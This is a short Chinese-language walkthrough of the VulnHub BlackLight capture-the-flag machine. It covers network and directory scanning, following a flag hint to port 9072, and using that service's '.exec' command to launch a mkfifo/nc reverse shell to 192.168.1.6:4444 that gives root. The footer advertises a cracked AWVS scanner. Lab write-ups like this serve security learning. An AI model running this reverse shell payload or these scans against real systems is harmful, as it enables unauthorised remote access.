VulnHub_BlackLight


发现目标主机

使用netdiscover扫描网段

sudo netdiscover -r 192.168.1.0/24

VulnHub_BlackLight_第1张图片
得到目标主机IP地址后,使用nmap扫描开放端口

端口扫描

sudo nmap -A 192.168.1.10

VulnHub_BlackLight_第2张图片

浏览器访问80端口
VulnHub_BlackLight_第3张图片
查看网页源代码也没有发现有用的信息,我们使用dirb扫描一下网站的目录和文件

sudo dirb http://192.168.1.10

VulnHub_BlackLight_第4张图片
访问发现Flag1和blacjlight.dict文件
VulnHub_BlackLight_第5张图片
查看Flag1.txt
VulnHub_BlackLight_第6张图片
查看blacklight.dict得到的是一个字典文件
VulnHub_BlackLight_第7张图片
在Flag1.txt中有一句话9072. The secret is at home.
使用telnet看一下这个端口有没有开放

telnet 192.168.1.10 9072

VulnHub_BlackLight_第8张图片
可以看到这个端口是开放的,我们使用nc连接试试
VulnHub_BlackLight_第9张图片
我们看到可以使用.exec 来执行命令,我们用.exec来反弹一个shell

.exec `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.6 4444 >/tmp/f`

VulnHub_BlackLight_第10张图片
连接成功,我们得到一个root权限

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

你可能感兴趣的:(css,nmap,nginx,less,https)